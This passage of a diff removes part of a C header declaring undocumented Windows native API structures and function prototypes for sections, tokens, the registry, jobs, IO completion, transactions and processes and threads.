MEMORY_PARTITION_PAGE_RANGE PartitionRanges[1]; -} MEMORY_PARTITION_INITIAL_ADD_INFORMATION, *PMEMORY_PARTITION_INITIAL_ADD_INFORMATION; - -typedef struct _MEMORY_PARTITION_PAGE_COMBINE_INFORMATION { - PVOID StopHandle; - ULONG Flags; - ULONG_PTR TotalNumberOfPages; -} MEMORY_PARTITION_PAGE_COMBINE_INFORMATION, *PMEMORY_PARTITION_PAGE_COMBINE_INFORMATION; - -typedef struct _MEMORY_PARTITION_PAGEFILE_INFORMATION { - UNICODE_STRING PageFileName; - LARGE_INTEGER 
MinimumSize; - LARGE_INTEGER MaximumSize; - ULONG Flags; -} MEMORY_PARTITION_PAGEFILE_INFORMATION, *PMEMORY_PARTITION_PAGEFILE_INFORMATION; - -typedef struct _MEMORY_PARTITION_TRANSFER_INFORMATION { - ULONG_PTR NumberOfPages; - ULONG NumaNode; - ULONG Flags; -} MEMORY_PARTITION_TRANSFER_INFORMATION, *PMEMORY_PARTITION_TRANSFER_INFORMATION; - -typedef struct _MEMORY_PARTITION_CONFIGURATION_INFORMATION { - ULONG Flags; - ULONG NumaNode; - ULONG Channel; - ULONG NumberOfNumaNodes; - ULONG_PTR ResidentAvailablePages; - ULONG_PTR CommittedPages; - ULONG_PTR CommitLimit; - ULONG_PTR PeakCommitment; - ULONG_PTR TotalNumberOfPages; - ULONG_PTR AvailablePages; - ULONG_PTR ZeroPages; - ULONG_PTR FreePages; - ULONG_PTR StandbyPages; -} MEMORY_PARTITION_CONFIGURATION_INFORMATION, *PMEMORY_PARTITION_CONFIGURATION_INFORMATION; - -NTSYSAPI -NTSTATUS -NTAPI -NtCreateSection( - _Out_ PHANDLE SectionHandle, - _In_ ACCESS_MASK DesiredAccess, - _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, - _In_opt_ PLARGE_INTEGER MaximumSize, - _In_ ULONG SectionPageProtection, - _In_ ULONG AllocationAttributes, - _In_opt_ HANDLE FileHandle); - -NTSYSAPI -NTSTATUS -NTAPI -NtOpenSection( - _Out_ PHANDLE SectionHandle, - _In_ ACCESS_MASK DesiredAccess, - _In_ POBJECT_ATTRIBUTES ObjectAttributes); - -NTSYSAPI -NTSTATUS -NTAPI -NtMapViewOfSection( - _In_ HANDLE SectionHandle, - _In_ HANDLE ProcessHandle, - _Inout_ PVOID *BaseAddress, - _In_ ULONG_PTR ZeroBits, - _In_ SIZE_T CommitSize, - _Inout_opt_ PLARGE_INTEGER SectionOffset, - _Inout_ PSIZE_T ViewSize, - _In_ SECTION_INHERIT InheritDisposition, - _In_ ULONG AllocationType, - _In_ ULONG Win32Protect); - -NTSYSAPI -NTSTATUS -NTAPI -NtQuerySection( - _In_ HANDLE SectionHandle, - _In_ SECTION_INFORMATION_CLASS SectionInformationClass, - _Out_ PVOID SectionInformation, - _In_ SIZE_T SectionInformationLength, - _Out_opt_ PSIZE_T ReturnLength); - -NTSYSAPI -NTSTATUS -NTAPI -NtUnmapViewOfSection( - _In_ HANDLE ProcessHandle, - _In_ PVOID BaseAddress); - 
-NTSYSAPI -NTSTATUS -NTAPI -NtUnmapViewOfSectionEx( - _In_ HANDLE ProcessHandle, - _In_opt_ PVOID BaseAddress, - _In_ ULONG Flags); - -NTSYSAPI -NTSTATUS -NTAPI -NtExtendSection( - _In_ HANDLE SectionHandle, - _Inout_ PLARGE_INTEGER NewSectionSize); - -NTSYSAPI -NTSTATUS -NTAPI -NtMapUserPhysicalPages( - _In_ PVOID VirtualAddress, - _In_ ULONG_PTR NumberOfPages, - _In_reads_opt_(NumberOfPages) PULONG_PTR UserPfnArray); - -NTSYSAPI -NTSTATUS -NTAPI -NtMapUserPhysicalPagesScatter( - _In_reads_(NumberOfPages) PVOID *VirtualAddresses, - _In_ ULONG_PTR NumberOfPages, - _In_reads_opt_(NumberOfPages) PULONG_PTR UserPfnArray); - -NTSYSAPI -NTSTATUS -NTAPI -NtAllocateUserPhysicalPages( - _In_ HANDLE ProcessHandle, - _Inout_ PULONG_PTR NumberOfPages, - _Out_writes_(*NumberOfPages) PULONG_PTR UserPfnArray); - -NTSYSAPI -NTSTATUS -NTAPI -NtFreeUserPhysicalPages( - _In_ HANDLE ProcessHandle, - _Inout_ PULONG_PTR NumberOfPages, - _In_reads_(*NumberOfPages) PULONG_PTR UserPfnArray); - -NTSYSAPI -NTSTATUS -NTAPI -NtOpenPartition( - _Out_ PHANDLE PartitionHandle, - _In_ ACCESS_MASK DesiredAccess, - _In_ POBJECT_ATTRIBUTES ObjectAttributes); - -NTSYSAPI -NTSTATUS -NTAPI -NtManagePartition( - _In_ HANDLE TargetHandle, - _In_opt_ HANDLE SourceHandle, - _In_ MEMORY_PARTITION_INFORMATION_CLASS PartitionInformationClass, - _In_ PVOID PartitionInformation, - _In_ ULONG PartitionInformationLength); - -NTSYSAPI -NTSTATUS -NTAPI -NtCreatePartition( - _Out_ PHANDLE PartitionHandle, - _In_ ACCESS_MASK DesiredAccess, - _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, - _In_ ULONG PreferredNode); - -/************************************************************************************ -* -* Token API. 
-* -************************************************************************************/ - -NTSYSAPI -NTSTATUS -NTAPI -NtAccessCheck( - _In_ PSECURITY_DESCRIPTOR SecurityDescriptor, - _In_ HANDLE ClientToken, - _In_ ACCESS_MASK DesiredAccess, - _In_ PGENERIC_MAPPING GenericMapping, - _Out_writes_bytes_(*PrivilegeSetLength) PPRIVILEGE_SET PrivilegeSet, - _Inout_ PULONG PrivilegeSetLength, - _Out_ PACCESS_MASK GrantedAccess, - _Out_ PNTSTATUS AccessStatus); - -NTSYSAPI -NTSTATUS -NTAPI -NtAccessCheckByType( - _In_ PSECURITY_DESCRIPTOR SecurityDescriptor, - _In_opt_ PSID PrincipalSelfSid, - _In_ HANDLE ClientToken, - _In_ ACCESS_MASK DesiredAccess, - _In_reads_(ObjectTypeListLength) POBJECT_TYPE_LIST ObjectTypeList, - _In_ ULONG ObjectTypeListLength, - _In_ PGENERIC_MAPPING GenericMapping, - _Out_writes_bytes_(*PrivilegeSetLength) PPRIVILEGE_SET PrivilegeSet, - _Inout_ PULONG PrivilegeSetLength, - _Out_ PACCESS_MASK GrantedAccess, - _Out_ PNTSTATUS AccessStatus); - -NTSYSAPI -NTSTATUS -NTAPI -NtAccessCheckByTypeResultList( - _In_ PSECURITY_DESCRIPTOR SecurityDescriptor, - _In_opt_ PSID PrincipalSelfSid, - _In_ HANDLE ClientToken, - _In_ ACCESS_MASK DesiredAccess, - _In_reads_(ObjectTypeListLength) POBJECT_TYPE_LIST ObjectTypeList, - _In_ ULONG ObjectTypeListLength, - _In_ PGENERIC_MAPPING GenericMapping, - _Out_writes_bytes_(*PrivilegeSetLength) PPRIVILEGE_SET PrivilegeSet, - _Inout_ PULONG PrivilegeSetLength, - _Out_writes_(ObjectTypeListLength) PACCESS_MASK GrantedAccess, - _Out_writes_(ObjectTypeListLength) PNTSTATUS AccessStatus); - -NTSYSAPI -NTSTATUS -NTAPI -NtOpenProcessToken( - _In_ HANDLE ProcessHandle, - _In_ ACCESS_MASK DesiredAccess, - _Out_ PHANDLE TokenHandle); - -NTSYSAPI -NTSTATUS -NTAPI -NtOpenProcessTokenEx( - _In_ HANDLE ProcessHandle, - _In_ ACCESS_MASK DesiredAccess, - _In_ ULONG HandleAttributes, - _Out_ PHANDLE TokenHandle); - -NTSYSAPI -NTSTATUS -NTAPI -NtDuplicateToken( - _In_ HANDLE ExistingTokenHandle, - _In_ ACCESS_MASK DesiredAccess, - 
_In_ POBJECT_ATTRIBUTES ObjectAttributes, - _In_ BOOLEAN EffectiveOnly, - _In_ TOKEN_TYPE TokenType, - _Out_ PHANDLE NewTokenHandle); - -#define DISABLE_MAX_PRIVILEGE 0x1 // winnt -#define SANDBOX_INERT 0x2 // winnt -#define LUA_TOKEN 0x4 -#define WRITE_RESTRICT 0x8 - -NTSYSAPI -NTSTATUS -NTAPI -NtFilterToken( - _In_ HANDLE ExistingTokenHandle, - _In_ ULONG Flags, - _In_opt_ PTOKEN_GROUPS SidsToDisable, - _In_opt_ PTOKEN_PRIVILEGES PrivilegesToDelete, - _In_opt_ PTOKEN_GROUPS RestrictedSids, - _Out_ PHANDLE NewTokenHandle); - -NTSYSAPI -NTSTATUS -NTAPI -NtImpersonateAnonymousToken( - _In_ HANDLE ThreadHandle); - -NTSYSAPI -NTSTATUS -NTAPI -NtQueryInformationToken( - _In_ HANDLE TokenHandle, - _In_ TOKEN_INFORMATION_CLASS TokenInformationClass, - _Out_writes_bytes_(TokenInformationLength) PVOID TokenInformation, - _In_ ULONG TokenInformationLength, - _Out_ PULONG ReturnLength); - -NTSYSAPI -NTSTATUS -NTAPI -NtSetInformationToken( - _In_ HANDLE TokenHandle, - _In_ TOKEN_INFORMATION_CLASS TokenInformationClass, - _In_reads_bytes_(TokenInformationLength) PVOID TokenInformation, - _In_ ULONG TokenInformationLength); - -NTSYSAPI -NTSTATUS -NTAPI -NtOpenThreadToken( - _In_ HANDLE ThreadHandle, - _In_ ACCESS_MASK DesiredAccess, - _In_ BOOLEAN OpenAsSelf, - _Out_ PHANDLE TokenHandle); - -NTSYSAPI -NTSTATUS -NTAPI -NtOpenThreadTokenEx( - _In_ HANDLE ThreadHandle, - _In_ ACCESS_MASK DesiredAccess, - _In_ BOOLEAN OpenAsSelf, - _In_ ULONG HandleAttributes, - _Out_ PHANDLE TokenHandle); - -NTSYSAPI -NTSTATUS -NTAPI -NtAdjustPrivilegesToken( - _In_ HANDLE TokenHandle, - _In_ BOOLEAN DisableAllPrivileges, - _In_opt_ PTOKEN_PRIVILEGES NewState, - _In_ ULONG BufferLength, - _Out_writes_bytes_to_opt_(BufferLength, *ReturnLength) PTOKEN_PRIVILEGES PreviousState, - _Out_ _When_(PreviousState == NULL, _Out_opt_) PULONG ReturnLength); - -NTSYSAPI -NTSTATUS -NTAPI -NtAdjustGroupsToken( - _In_ HANDLE TokenHandle, - _In_ BOOLEAN ResetToDefault, - _In_opt_ PTOKEN_GROUPS NewState, - _In_opt_ 
ULONG BufferLength, - _Out_writes_bytes_to_opt_(BufferLength, *ReturnLength) PTOKEN_GROUPS PreviousState, - _Out_ PULONG ReturnLength); - -NTSYSAPI -NTSTATUS -NTAPI -NtCompareTokens( - _In_ HANDLE FirstTokenHandle, - _In_ HANDLE SecondTokenHandle, - _Out_ PBOOLEAN Equal); - -NTSYSAPI -NTSTATUS -NTAPI -NtPrivilegeCheck( - _In_ HANDLE ClientToken, - _Inout_ PPRIVILEGE_SET RequiredPrivileges, - _Out_ PBOOLEAN Result); - -NTSYSAPI -NTSTATUS -NTAPI -NtCreateToken( - _Out_ PHANDLE TokenHandle, - _In_ ACCESS_MASK DesiredAccess, - _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, - _In_ TOKEN_TYPE TokenType, - _In_ PLUID AuthenticationId, - _In_ PLARGE_INTEGER ExpirationTime, - _In_ PTOKEN_USER User, - _In_ PTOKEN_GROUPS Groups, - _In_ PTOKEN_PRIVILEGES Privileges, - _In_opt_ PTOKEN_OWNER Owner, - _In_ PTOKEN_PRIMARY_GROUP PrimaryGroup, - _In_opt_ PTOKEN_DEFAULT_DACL DefaultDacl, - _In_ PTOKEN_SOURCE TokenSource); - -NTSYSAPI -NTSTATUS -NTAPI -NtCreateTokenEx( - _Out_ PHANDLE TokenHandle, - _In_ ACCESS_MASK DesiredAccess, - _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, - _In_ TOKEN_TYPE TokenType, - _In_ PLUID AuthenticationId, - _In_ PLARGE_INTEGER ExpirationTime, - _In_ PTOKEN_USER User, - _In_ PTOKEN_GROUPS Groups, - _In_ PTOKEN_PRIVILEGES Privileges, - _In_opt_ PVOID UserAttributes, // points to TOKEN_SECURITY_ATTRIBUTES_INFORMATION - _In_opt_ PVOID DeviceAttributes, // points to PTOKEN_SECURITY_ATTRIBUTES_INFORMATION - _In_opt_ PTOKEN_GROUPS DeviceGroups, - _In_opt_ PTOKEN_MANDATORY_POLICY TokenMandatoryPolicy, - _In_opt_ PTOKEN_OWNER Owner, - _In_ PTOKEN_PRIMARY_GROUP PrimaryGroup, - _In_opt_ PTOKEN_DEFAULT_DACL DefaultDacl, - _In_ PTOKEN_SOURCE TokenSource); - -NTSYSAPI -NTSTATUS -NTAPI -NtCreateLowBoxToken( - _Out_ PHANDLE TokenHandle, - _In_ HANDLE ExistingTokenHandle, - _In_ ACCESS_MASK DesiredAccess, - _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, - _In_ PSID PackageSid, - _In_ ULONG CapabilityCount, - _In_reads_opt_(CapabilityCount) PSID_AND_ATTRIBUTES 
Capabilities, - _In_ ULONG HandleCount, - _In_reads_opt_(HandleCount) HANDLE *Handles); - -/************************************************************************************ -* -* Registry API. -* -************************************************************************************/ - -NTSYSAPI -NTSTATUS -NTAPI -NtCreateKey( - _Out_ PHANDLE KeyHandle, - _In_ ACCESS_MASK DesiredAccess, - _In_ POBJECT_ATTRIBUTES ObjectAttributes, - _Reserved_ ULONG TitleIndex, - _In_opt_ PUNICODE_STRING Class, - _In_ ULONG CreateOptions, - _Out_opt_ PULONG Disposition); - -NTSYSAPI -NTSTATUS -NTAPI -NtCreateKeyTransacted( - _Out_ PHANDLE KeyHandle, - _In_ ACCESS_MASK DesiredAccess, - _In_ POBJECT_ATTRIBUTES ObjectAttributes, - _Reserved_ ULONG TitleIndex, - _In_opt_ PUNICODE_STRING Class, - _In_ ULONG CreateOptions, - _In_ HANDLE TransactionHandle, - _Out_opt_ PULONG Disposition); - -NTSYSAPI -NTSTATUS -NTAPI -NtOpenKey( - _Out_ PHANDLE KeyHandle, - _In_ ACCESS_MASK DesiredAccess, - _In_ POBJECT_ATTRIBUTES ObjectAttributes); - -NTSYSAPI -NTSTATUS -NTAPI -NtOpenKeyEx( - _Out_ PHANDLE KeyHandle, - _In_ ACCESS_MASK DesiredAccess, - _In_ POBJECT_ATTRIBUTES ObjectAttributes, - _In_ ULONG OpenOptions); - -NTSYSAPI -NTSTATUS -NTAPI -NtOpenKeyTransacted( - _Out_ PHANDLE KeyHandle, - _In_ ACCESS_MASK DesiredAccess, - _In_ POBJECT_ATTRIBUTES ObjectAttributes, - _In_ HANDLE TransactionHandle); - -NTSYSAPI -NTSTATUS -NTAPI -NtOpenKeyTransactedEx( - _Out_ PHANDLE KeyHandle, - _In_ ACCESS_MASK DesiredAccess, - _In_ POBJECT_ATTRIBUTES ObjectAttributes, - _In_ ULONG OpenOptions, - _In_ HANDLE TransactionHandle); - -NTSYSAPI -NTSTATUS -NTAPI -NtQueryKey( - _In_ HANDLE KeyHandle, - _In_ KEY_INFORMATION_CLASS KeyInformationClass, - _Out_writes_bytes_opt_(Length) PVOID KeyInformation, - _In_ ULONG Length, - _Out_ PULONG ResultLength); - -NTSYSAPI -NTSTATUS -NTAPI -NtEnumerateKey( - _In_ HANDLE KeyHandle, - _In_ ULONG Index, - _In_ KEY_INFORMATION_CLASS KeyInformationClass, - 
_Out_writes_bytes_opt_(Length) PVOID KeyInformation, - _In_ ULONG Length, - _Out_ PULONG ResultLength); - -NTSYSAPI -NTSTATUS -NTAPI -NtEnumerateValueKey( - _In_ HANDLE KeyHandle, - _In_ ULONG Index, - _In_ KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass, - _Out_writes_bytes_opt_(Length) PVOID KeyValueInformation, - _In_ ULONG Length, - _Out_ PULONG ResultLength); - -NTSYSAPI -NTSTATUS -NTAPI -NtQueryValueKey( - _In_ HANDLE KeyHandle, - _In_ PUNICODE_STRING ValueName, - _In_ KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass, - _Out_writes_bytes_opt_(Length) PVOID KeyValueInformation, - _In_ ULONG Length, - _Out_ PULONG ResultLength); - -NTSYSAPI -NTSTATUS -NTAPI -NtQueryMultipleValueKey( - _In_ HANDLE KeyHandle, - _Inout_updates_(EntryCount) PKEY_VALUE_ENTRY ValueEntries, - _In_ ULONG EntryCount, - _Out_writes_bytes_(*BufferLength) PVOID ValueBuffer, - _Inout_ PULONG BufferLength, - _Out_opt_ PULONG RequiredBufferLength); - -NTSYSAPI -NTSTATUS -NTAPI -NtSetValueKey( - _In_ HANDLE KeyHandle, - _In_ PUNICODE_STRING ValueName, - _In_opt_ ULONG TitleIndex, - _In_ ULONG Type, - _In_reads_bytes_opt_(DataSize) PVOID Data, - _In_ ULONG DataSize); - -NTSYSAPI -NTSTATUS -NTAPI -NtDeleteKey( - _In_ HANDLE KeyHandle); - -NTSYSAPI -NTSTATUS -NTAPI -NtDeleteValueKey( - _In_ HANDLE KeyHandle, - _In_ PUNICODE_STRING ValueName); - -NTSYSAPI -NTSTATUS -NTAPI -NtRenameKey( - _In_ HANDLE KeyHandle, - _In_ PUNICODE_STRING NewName); - -NTSYSAPI -NTSTATUS -NTAPI -NtSetInformationKey( - _In_ HANDLE KeyHandle, - _In_ KEY_SET_INFORMATION_CLASS KeySetInformationClass, - _In_reads_bytes_(KeySetInformationLength) PVOID KeySetInformation, - _In_ ULONG KeySetInformationLength); - -NTSYSAPI -NTSTATUS -NTAPI -NtFlushKey( - _In_ HANDLE KeyHandle); - -NTSYSAPI -NTSTATUS -NTAPI -NtCompressKey( - _In_ HANDLE Key); - -NTSYSAPI -NTSTATUS -NTAPI -NtLoadKey( - _In_ POBJECT_ATTRIBUTES TargetKey, - _In_ POBJECT_ATTRIBUTES SourceFile); - -NTSYSAPI -NTSTATUS -NTAPI -NtLoadKey2( - _In_ 
POBJECT_ATTRIBUTES TargetKey, - _In_ POBJECT_ATTRIBUTES SourceFile, - _In_ ULONG Flags); - -NTSYSAPI -NTSTATUS -NTAPI -NtLoadKeyEx( - _In_ POBJECT_ATTRIBUTES TargetKey, - _In_ POBJECT_ATTRIBUTES SourceFile, - _In_ ULONG Flags, - _In_opt_ HANDLE TrustClassKey, - _In_opt_ HANDLE Event, - _In_opt_ ACCESS_MASK DesiredAccess, - _Out_opt_ PHANDLE RootHandle, - _Out_opt_ PIO_STATUS_BLOCK IoStatus); - -NTSYSAPI -NTSTATUS -NTAPI -NtSaveKey( - _In_ HANDLE KeyHandle, - _In_ HANDLE FileHandle); - -NTSYSAPI -NTSTATUS -NTAPI -NtSaveKeyEx( - _In_ HANDLE KeyHandle, - _In_ HANDLE FileHandle, - _In_ ULONG Format); - -NTSYSAPI -NTSTATUS -NTAPI -NtUnloadKey( - _In_ POBJECT_ATTRIBUTES TargetKey); - -NTSYSAPI -NTSTATUS -NTAPI -NtUnloadKey2( - _In_ POBJECT_ATTRIBUTES TargetKey, - _In_ ULONG Flags); - -NTSYSAPI -NTSTATUS -NTAPI -NtUnloadKeyEx( - _In_ POBJECT_ATTRIBUTES TargetKey, - _In_opt_ HANDLE Event); - -NTSYSAPI -NTSTATUS -NTAPI -NtNotifyChangeKey( - _In_ HANDLE KeyHandle, - _In_opt_ HANDLE Event, - _In_opt_ PIO_APC_ROUTINE ApcRoutine, - _In_opt_ PVOID ApcContext, - _Out_ PIO_STATUS_BLOCK IoStatusBlock, - _In_ ULONG CompletionFilter, - _In_ BOOLEAN WatchTree, - _Out_writes_bytes_opt_(BufferSize) PVOID Buffer, - _In_ ULONG BufferSize, - _In_ BOOLEAN Asynchronous); - -NTSYSAPI -NTSTATUS -NTAPI -NtLockRegistryKey( - _In_ HANDLE KeyHandle); - -/************************************************************************************ -* -* Job API. 
-* -************************************************************************************/ - -NTSYSAPI -NTSTATUS -NTAPI -NtAssignProcessToJobObject( - _In_ HANDLE JobHandle, - _In_ HANDLE ProcessHandle); - -NTSYSAPI -NTSTATUS -NTAPI -NtCreateJobObject( - _Out_ PHANDLE JobHandle, - _In_ ACCESS_MASK DesiredAccess, - _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes); - -NTSYSAPI -NTSTATUS -NTAPI -NtCreateJobSet( - _In_ ULONG NumJob, - _In_reads_(NumJob) PJOB_SET_ARRAY UserJobSet, - _In_ ULONG Flags); - -NTSYSAPI -NTSTATUS -NTAPI -NtIsProcessInJob( - _In_ HANDLE ProcessHandle, - _In_opt_ HANDLE JobHandle); - -NTSYSAPI -NTSTATUS -NTAPI -NtOpenJobObject( - _Out_ PHANDLE JobHandle, - _In_ ACCESS_MASK DesiredAccess, - _In_ POBJECT_ATTRIBUTES ObjectAttributes); - -NTSYSAPI -NTSTATUS -NTAPI -NtQueryInformationJobObject( - _In_opt_ HANDLE JobHandle, - _In_ JOBOBJECTINFOCLASS JobObjectInformationClass, - _Out_writes_bytes_(JobObjectInformationLength) PVOID JobObjectInformation, - _In_ ULONG JobObjectInformationLength, - _Out_opt_ PULONG ReturnLength); - -NTSYSAPI -NTSTATUS -NTAPI -NtSetInformationJobObject( - _In_ HANDLE JobHandle, - _In_ JOBOBJECTINFOCLASS JobObjectInformationClass, - _In_reads_bytes_(JobObjectInformationLength) PVOID JobObjectInformation, - _In_ ULONG JobObjectInformationLength); - -NTSYSAPI -NTSTATUS -NTAPI -NtTerminateJobObject( - _In_ HANDLE JobHandle, - _In_ NTSTATUS ExitStatus); - -/************************************************************************************ -* -* Session API. -* -************************************************************************************/ - -NTSYSAPI -NTSTATUS -NTAPI -NtOpenSession( - _Out_ PHANDLE SessionHandle, - _In_ ACCESS_MASK DesiredAccess, - _In_ POBJECT_ATTRIBUTES ObjectAttributes); - -/************************************************************************************ -* -* IO Completion API. 
-* -************************************************************************************/ - -typedef enum _IO_COMPLETION_INFORMATION_CLASS { - IoCompletionBasicInformation -} IO_COMPLETION_INFORMATION_CLASS; - -typedef struct _IO_COMPLETION_BASIC_INFORMATION { - LONG Depth; -} IO_COMPLETION_BASIC_INFORMATION, *PIO_COMPLETION_BASIC_INFORMATION; - -NTSYSAPI -NTSTATUS -NTAPI -NtCreateIoCompletion( - _Out_ PHANDLE IoCompletionHandle, - _In_ ACCESS_MASK DesiredAccess, - _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, - _In_opt_ ULONG Count); - -NTSYSAPI -NTSTATUS -NTAPI -NtOpenIoCompletion( - _Out_ PHANDLE IoCompletionHandle, - _In_ ACCESS_MASK DesiredAccess, - _In_ POBJECT_ATTRIBUTES ObjectAttributes); - -NTSYSAPI -NTSTATUS -NTAPI -NtQueryIoCompletion( - _In_ HANDLE IoCompletionHandle, - _In_ IO_COMPLETION_INFORMATION_CLASS IoCompletionInformationClass, - _Out_writes_bytes_(IoCompletionInformationLength) PVOID IoCompletionInformation, - _In_ ULONG IoCompletionInformationLength, - _Out_opt_ PULONG ReturnLength); - -NTSYSAPI -NTSTATUS -NTAPI -NtSetIoCompletion( - _In_ HANDLE IoCompletionHandle, - _In_opt_ PVOID KeyContext, - _In_opt_ PVOID ApcContext, - _In_ NTSTATUS IoStatus, - _In_ ULONG_PTR IoStatusInformation); - -NTSYSAPI -NTSTATUS -NTAPI -NtSetIoCompletionEx( - _In_ HANDLE IoCompletionHandle, - _In_ HANDLE IoCompletionPacketHandle, - _In_opt_ PVOID KeyContext, - _In_opt_ PVOID ApcContext, - _In_ NTSTATUS IoStatus, - _In_ ULONG_PTR IoStatusInformation); - -NTSYSAPI -NTSTATUS -NTAPI -NtRemoveIoCompletion( - _In_ HANDLE IoCompletionHandle, - _Out_ PVOID *KeyContext, - _Out_ PVOID *ApcContext, - _Out_ PIO_STATUS_BLOCK IoStatusBlock, - _In_opt_ PLARGE_INTEGER Timeout); - -/************************************************************************************ -* -* Transactions API. 
-* -************************************************************************************/ - -//TmTx -NTSYSAPI -NTSTATUS -NTAPI -NtCreateTransaction( - _Out_ PHANDLE TransactionHandle, - _In_ ACCESS_MASK DesiredAccess, - _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, - _In_opt_ LPGUID Uow, - _In_opt_ HANDLE TmHandle, - _In_opt_ ULONG CreateOptions, - _In_opt_ ULONG IsolationLevel, - _In_opt_ ULONG IsolationFlags, - _In_opt_ PLARGE_INTEGER Timeout, - _In_opt_ PUNICODE_STRING Description); - -NTSYSAPI -NTSTATUS -NTAPI -NtOpenTransaction( - _Out_ PHANDLE TransactionHandle, - _In_ ACCESS_MASK DesiredAccess, - _In_ POBJECT_ATTRIBUTES ObjectAttributes, - _In_ LPGUID Uow, - _In_opt_ HANDLE TmHandle); - -NTSYSAPI -NTSTATUS -NTAPI -NtRollbackTransaction( - _In_ HANDLE TransactionHandle, - _In_ BOOLEAN Wait); - -NTSYSAPI -NTSTATUS -NTAPI -NtCommitTransaction( - _In_ HANDLE TransactionHandle, - _In_ BOOLEAN Wait); - -NTSYSAPI -NTSTATUS -NTAPI -NtFreezeTransactions( - _In_ PLARGE_INTEGER FreezeTimeout, - _In_ PLARGE_INTEGER ThawTimeout); - -NTSYSAPI -NTSTATUS -NTAPI -NtThawTransactions( - VOID); - -//TmRm -NTSYSAPI -NTSTATUS -NTAPI -NtCreateResourceManager( - _Out_ PHANDLE ResourceManagerHandle, - _In_ ACCESS_MASK DesiredAccess, - _In_ HANDLE TmHandle, - _In_opt_ LPGUID ResourceManagerGuid, - _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, - _In_opt_ ULONG CreateOptions, - _In_opt_ PUNICODE_STRING Description); - -NTSYSAPI -NTSTATUS -NTAPI -NtOpenResourceManager( - _Out_ PHANDLE ResourceManagerHandle, - _In_ ACCESS_MASK DesiredAccess, - _In_ HANDLE TmHandle, - _In_opt_ LPGUID ResourceManagerGuid, - _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes); - -//TmEn -NTSYSAPI -NTSTATUS -NTAPI -NtCreateEnlistment( - _Out_ PHANDLE EnlistmentHandle, - _In_ ACCESS_MASK DesiredAccess, - _In_ HANDLE ResourceManagerHandle, - _In_ HANDLE TransactionHandle, - _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, - _In_opt_ ULONG CreateOptions, - _In_ NOTIFICATION_MASK NotificationMask, - _In_opt_ PVOID 
EnlistmentKey); - -NTSYSAPI -NTSTATUS -NTAPI -NtOpenEnlistment( - _Out_ PHANDLE EnlistmentHandle, - _In_ ACCESS_MASK DesiredAccess, - _In_ HANDLE ResourceManagerHandle, - _In_ LPGUID EnlistmentGuid, - _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes); - -//TmTm -NTSYSAPI -NTSTATUS -NTAPI -NtCreateTransactionManager( - _Out_ PHANDLE TmHandle, - _In_ ACCESS_MASK DesiredAccess, - _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, - _In_opt_ PUNICODE_STRING LogFileName, - _In_opt_ ULONG CreateOptions, - _In_opt_ ULONG CommitStrength); - -NTSYSAPI -NTSTATUS -NTAPI -NtOpenTransactionManager( - _Out_ PHANDLE TmHandle, - _In_ ACCESS_MASK DesiredAccess, - _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, - _In_opt_ PUNICODE_STRING LogFileName, - _In_opt_ LPGUID TmIdentity, - _In_opt_ ULONG OpenOptions); - -/************************************************************************************ -* -* Process and Thread API. -* -************************************************************************************/ - -NTSYSAPI -NTSTATUS -NTAPI -NtCreateUserProcess( - _Out_ PHANDLE ProcessHandle, - _Out_ PHANDLE ThreadHandle, - _In_ ACCESS_MASK ProcessDesiredAccess, - _In_ ACCESS_MASK ThreadDesiredAccess, - _In_opt_ POBJECT_ATTRIBUTES ProcessObjectAttributes, - _In_opt_ POBJECT_ATTRIBUTES ThreadObjectAttributes, - _In_ ULONG ProcessFlags, - _In_ ULONG ThreadFlags, - _In_opt_ PVOID ProcessParameters, - _Inout_ PPS_CREATE_INFO CreateInfo, - _In_opt_ PPS_ATTRIBUTE_LIST AttributeList); - -NTSYSAPI -NTSTATUS -NTAPI -NtOpenProcess( - _Out_ PHANDLE ProcessHandle, - _In_ ACCESS_MASK DesiredAccess, - _In_ POBJECT_ATTRIBUTES ObjectAttributes, - _In_opt_ PCLIENT_ID ClientId); - -NTSYSAPI -NTSTATUS -NTAPI -NtTerminateProcess( - _In_opt_ HANDLE ProcessHandle, - _In_ NTSTATUS ExitStatus); - -NTSYSAPI -NTSTATUS -NTAPI -NtSuspendProcess( - _In_ HANDLE ProcessHandle); - -NTSYSAPI -NTSTATUS -NTAPI -NtResumeProcess( - _In_ HANDLE ProcessHandle); - -NTSYSAPI -NTSTATUS -NTAPI -NtSuspendThread( - _In_ HANDLE 
ThreadHandle, - _Out_opt_ PULONG PreviousSuspendCount); - -NTSYSAPI -NTSTATUS -NTAPI -NtResumeThread( - _In_ HANDLE ThreadHandle, - _Out_opt_ PULONG PreviousSuspendCount); - -NTSYSAPI -NTSTATUS -NTAPI -NtOpenThread( - _Out_ PHANDLE ThreadHandle, - _In_ ACCESS_MASK DesiredAccess, - _In_ POBJECT_ATTRIBUTES ObjectAttributes, - _In_opt_ PCLIENT_ID ClientId); - -NTSYSAPI -NTSTATUS -NTAPI -NtTerminateThread( - _In_opt_ HANDLE ThreadHandle, - _In_ NTSTATUS ExitStatus); - -NTSYSAPI -NTSTATUS -NTAPI -NtImpersonateThread( - _In_ HANDLE ServerThreadHandle, - _In_ HANDLE ClientThreadHandle, - _In_ PSECURITY_QUALITY_OF_SERVICE SecurityQos); - -NTSYSAPI -NTSTATUS -NTAPI -NtSetContextThread( - _In_ HANDLE ThreadHandle, - _In_ PCONTEXT ThreadContext); - -NTSYSAPI -NTSTATUS -NTAPI -NtGetContextThread( - _In_ HANDLE ThreadHandle, - _Inout_ PCONTEXT ThreadContext); - -NTSYSAPI -NTSTATUS -NTAPI -NtQueryInformationThread( - _In_ HANDLE ThreadHandle, - _In_ THREADINFOCLASS ThreadInformationClass, - _Out_writes_bytes_(ThreadInformationLength) PVOID ThreadInformation, - _In_ ULONG ThreadInformationLength, - _Out_opt_ PULONG ReturnLength); - -NTSYSAPI 